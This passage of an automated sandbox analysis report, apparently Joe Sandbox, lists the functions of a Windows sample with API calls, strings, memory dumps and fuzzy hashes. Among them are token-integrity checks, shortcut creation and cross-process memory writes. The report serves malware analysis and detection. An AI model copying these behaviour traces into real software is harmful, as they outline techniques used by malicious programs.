Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: b07580e8af0a4385eb7d01889286373d25ba653878ac3ac4cc15db702669af0b
Instruction ID: 605282afe27ea99ecf25610b15a15e4f603d6097efdc77c7d66b8c6f76b4cbc5
Opcode Fuzzy Hash: b07580e8af0a4385eb7d01889286373d25ba653878ac3ac4cc15db702669af0b
Instruction Fuzzy Hash: 7F014B76600219FFEB115F68ED44BAABBEEEB46752F148024FD06D2210D774ED489BB0

Function 0065AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0065AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0065AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0065AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0065AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0065AAAF

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9b36b6533faba7bfd6a5d4d7447fb16218b5fff4822f8be2847e9f9b087b6eea
Instruction ID: 2d2e63ff2882ef3a9bf2f9258f41e5a751817c327cf577d470dffdc67170305c
Opcode Fuzzy Hash: 9b36b6533faba7bfd6a5d4d7447fb16218b5fff4822f8be2847e9f9b087b6eea
Instruction Fuzzy Hash: 07F04F712402087FEB116FA4EC89EAB3BAEFF4A755F000619F942C7290DB60AC45CE61

Function 0065AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0065AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0065AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0065AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065AB10

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: e82ca7b0dca7481e13bc95795c38ac7d250f968e829874842d6e0fe6f693d948
Instruction ID: 844076cf31c7c6c9e8cfe214f5793a4f040d2b022c6c5a6ae7b793eab67aa4d4
Opcode Fuzzy Hash: e82ca7b0dca7481e13bc95795c38ac7d250f968e829874842d6e0fe6f693d948
Instruction Fuzzy Hash: 04F04F712402087FEB111FA4EC88EBB3B6EFF46755F000129F942C7290DA60AC058EB1

Function 0065EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0065EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0065ECAB
MessageBeep.USER32(00000000), ref: 0065ECC3
KillTimer.USER32(?,0000040A), ref: 0065ECDF
EndDialog.USER32(?,00000001), ref: 0065ECF9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: fa8a8d54269bcab448bc41ddd9befadbec7c9401e36ee351a4212c154fa9491b
Instruction ID: e08c45d8b2497805585be7045fce197e2ec2e1b3bcf90affcc39fc169bfc4546
Opcode Fuzzy Hash: fa8a8d54269bcab448bc41ddd9befadbec7c9401e36ee351a4212c154fa9491b
Instruction Fuzzy Hash: 14016D30900715ABEF296B10DE4EB9677BABF01706F005559B9A7A18E0DBF5AA488F40

Function 0063B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0063B0BA
StrokeAndFillPath.GDI32(?,?,0069E680,00000000,?,?,?), ref: 0063B0D6
SelectObject.GDI32(?,00000000), ref: 0063B0E9
DeleteObject.GDI32 ref: 0063B0FC
StrokePath.GDI32(?), ref: 0063B117

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 3f9bd7a2e8c92c025c7cafd337a7c154ad57d8982b716a07540ad9bed70985a9
Instruction ID: d7ce7aafb1b9448172be6b4aa0ff5d3052e6972a046d9364a332b69fd92fd172
Opcode Fuzzy Hash: 3f9bd7a2e8c92c025c7cafd337a7c154ad57d8982b716a07540ad9bed70985a9
Instruction Fuzzy Hash: 48F01970000384EFCB21AF65EC4C7993B67AB12362F18A314E5664C5F0C7309A66EF50

Function 0066F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0066F2DA
CoCreateInstance.OLE32(006ADA7C,00000000,00000001,006AD8EC,?), ref: 0066F2F2
CoUninitialize.OLE32 ref: 0066F555

Strings

.lnk, xrefs: 0066F28B, 0066F290, 0066F29E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 2b9c2a556ce9df68016599c505ce4f3bff16af1c7a945a295fc0c30cf37835de
Instruction ID: 2162cf6b9b0cc92cc63c55ba176a799c2cc7343068c08cc4c8cf18669f8d760d
Opcode Fuzzy Hash: 2b9c2a556ce9df68016599c505ce4f3bff16af1c7a945a295fc0c30cf37835de
Instruction Fuzzy Hash: F9A13AB1104201AFD740EF64D891EAFB7EDEF98314F00491DF55697192EB70EA09CBA6

Function 0066E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0062660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006253B1,?,?,006261FF,?,00000000,00000001,00000000), ref: 0062662F

CoInitialize.OLE32(00000000), ref: 0066E85D
CoCreateInstance.OLE32(006ADA7C,00000000,00000001,006AD8EC,?), ref: 0066E876
CoUninitialize.OLE32 ref: 0066E893

Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF

Strings

.lnk, xrefs: 0066E83B, 0066E84D

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: d1633e6e78fbcb8b32fb8a42d76d224fe64a72801dce39fd6fe7df092b4ec278
Instruction ID: 50d652132781e205843be95e01d8c50ea35872a36ed29d8da680e2fbd167d880
Opcode Fuzzy Hash: d1633e6e78fbcb8b32fb8a42d76d224fe64a72801dce39fd6fe7df092b4ec278
Instruction Fuzzy Hash: 11A154796047119FCB50EF14C48496ABBE6BF89310F04898CF9969B3A1CB32EC45CF95

Function 0064325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006432ED

Part of subcall function 0064E0D0: __87except.LIBCMT ref: 0064E10B

Strings

pow, xrefs: 006432C5, 006432E2

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: ec2a2b731a6aa9f30c7a0ba29fc91398d14dda941b39888f86ad32b71f74ef02
Instruction ID: d1db6a3c103fa805677ac9e876653f83a4fba3779a7aa08258db022090bf17cd
Opcode Fuzzy Hash: ec2a2b731a6aa9f30c7a0ba29fc91398d14dda941b39888f86ad32b71f74ef02
Instruction Fuzzy Hash: 2C515A71A0820296CB127B14C9413FB3BD7BB40710F209E28E4D6823E9DFB68ED59A46

Function 00664606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,006BDC50,?,0000000F,0000000C,00000016,006BDC50,?), ref: 00664645

Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 006646C5

Strings

THIS, xrefs: 00664703
REMOVE, xrefs: 00664676

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 3c0af158a056772f2052add8ec07033a0637866e2ed67d059811d99e3f97ad88
Instruction ID: 746a6a6b48222d846935be0b74c123816ffce691d2dd300e29be1e8be8ea3934
Opcode Fuzzy Hash: 3c0af158a056772f2052add8ec07033a0637866e2ed67d059811d99e3f97ad88
Instruction Fuzzy Hash: 92415E34A002199FCF45EF64C881AAEBBB6FF49304F148469E916AB3A2DF34DD45CB54

Function 0065C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0066430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0065BC08,?,?,00000034,00000800,?,00000034), ref: 00664335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0065C1D3

Part of subcall function 006642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0065BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00664300

Part of subcall function 0066422F: GetWindowThreadProcessId.USER32(?,?), ref: 0066425A
Part of subcall function 0066422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0065BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0066426A
Part of subcall function 0066422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0065BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00664280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0065C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0065C28D

Strings

@, xrefs: 0065C2A5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: c7682a68f6b54a604503570a69523e04cd60d6314ea9a02b437600a29e9c3096
Instruction ID: a929570c56e358b92ca36014d1147906d3c4939829bdafa0425e8835d06a6fbd
Opcode Fuzzy Hash: c7682a68f6b54a604503570a69523e04cd60d6314ea9a02b437600a29e9c3096
Instruction Fuzzy Hash: 55414C72900218BFDB10DFA4CC81AEEB779EF09710F104099FA45B7281DA71AF49CB61

Function 0068A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,006BDC00,00000000,?,?,?,?), ref: 0068A6D8
GetWindowLongW.USER32 ref: 0068A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0068A705

Strings

SysTreeView32, xrefs: 0068A6AA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 3b1ac1abbe96535cc0bff1e18009da717377cef953d8b21c7b097c7ffb7637b0
Instruction ID: 8d87f43d6ab1e5a2efefff8205733d6b1edb27b05581d8aa16e8df116be91b52
Opcode Fuzzy Hash: 3b1ac1abbe96535cc0bff1e18009da717377cef953d8b21c7b097c7ffb7637b0
Instruction Fuzzy Hash: CC31E131100206AFEB21AF74CC41BEA7BAAFF49324F24431AF975932E0D730AC509B94

Function 00675180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00675190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 006751C6

Strings

|, xrefs: 006751B5
Dg, xrefs: 0067522E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$Dg
API String ID: 1413715105-1330200442
Opcode ID: 29499d9b9dda037cb65ca7a2290db4e89d51feb6427a16ec760bc1521dd31ee1
Instruction ID: cd771f487d3030bdb2c32ab30f65413f1e5138b22486ce7814982b9e89835ad0
Opcode Fuzzy Hash: 29499d9b9dda037cb65ca7a2290db4e89d51feb6427a16ec760bc1521dd31ee1
Instruction Fuzzy Hash: 50315971C01119EBCF51EFA0DC81AEE7FBAFF14710F004059F915A6166EA31AA06CFA4

Function 0068A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0068A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0068A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 0068A196

Strings

SysMonthCal32, xrefs: 0068A129

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: c53e14122089d48160764d7f1b65f6c35f66537f6c7775d9352b365033e950b5
Instruction ID: ec12208ffd93071b41f5ed4454ea3f65c4678d85ce0ea703bd0fe334c7418808
Opcode Fuzzy Hash: c53e14122089d48160764d7f1b65f6c35f66537f6c7775d9352b365033e950b5
Instruction Fuzzy Hash: 73219F32510218BBEF119FA4CC86FEA3B7AEF48714F110215FE556B1D0D6B5AC55CB90

Function 0068A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0068A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0068A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0068A956

Strings

msctls_updown32, xrefs: 0068A8BB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 1edc8731e4f8f5b6518d86294282655c3922042edb086f8541d9681c9ee7a3b6
Instruction ID: acb0408a4c414d8bae3b95e926cba938f773603173bdbecf2de044f1344d913c
Opcode Fuzzy Hash: 1edc8731e4f8f5b6518d86294282655c3922042edb086f8541d9681c9ee7a3b6
Instruction Fuzzy Hash: DD2192B5610209AFEB10EF58DCD1DA737AEEB5A354B05015AFA059B351CB30EC11DB61

Function 006899A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00689A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00689A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00689A65

Strings

Listbox, xrefs: 006899FD

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: c63e0555ba5749380d2a116b90ab7bd9218e408ec001dc930d6ac04c7d21d208
Instruction ID: e19c4138c7835f96df4b3ef98ea62a758219fcac58ec0025a9b5c9262a1ddef0
Opcode Fuzzy Hash: c63e0555ba5749380d2a116b90ab7bd9218e408ec001dc930d6ac04c7d21d208
Instruction Fuzzy Hash: FC21C532610118BFDF259F54CC85EFF3BABEF8A750F058229F9455B290CA719C118BA0

Function 0068A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0068A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0068A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0068A48F

Strings

msctls_trackbar32, xrefs: 0068A444

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 3a5263244e8f592bc3861b3bca640168bfc7b18b27febab4c178d350f25d175d
Instruction ID: 98911b3791ba69dd0bf1b022cf3b8ed122cb676add3a977600fde854b2352243
Opcode Fuzzy Hash: 3a5263244e8f592bc3861b3bca640168bfc7b18b27febab4c178d350f25d175d
Instruction Fuzzy Hash: D311CA71240208BEEF246F75CC49FEB37AAEF89754F014229FA45A6191D6B2E811DB24

Function 00642287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00642350,?), ref: 006422A1
GetProcAddress.KERNEL32(00000000), ref: 006422A8

Strings

combase.dll, xrefs: 0064229C
RoInitialize, xrefs: 00642290

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: aa1bbbf017a40eeb28f2b4186bfcde306606700ca5ae8c3187c85dc850a24f7c
Instruction ID: 99031faf73e89b9b51787976aea6de9395a029d305a07bbb658250e0031d0fd2
Opcode Fuzzy Hash: aa1bbbf017a40eeb28f2b4186bfcde306606700ca5ae8c3187c85dc850a24f7c
Instruction Fuzzy Hash: 07E09270A543419BEB506FB1DC8DB993657A705705F516024F202DD5A0DBF95584CF18

Function 0064235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00642276), ref: 00642376
GetProcAddress.KERNEL32(00000000), ref: 0064237D

Strings

RoUninitialize, xrefs: 00642365
combase.dll, xrefs: 00642371

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
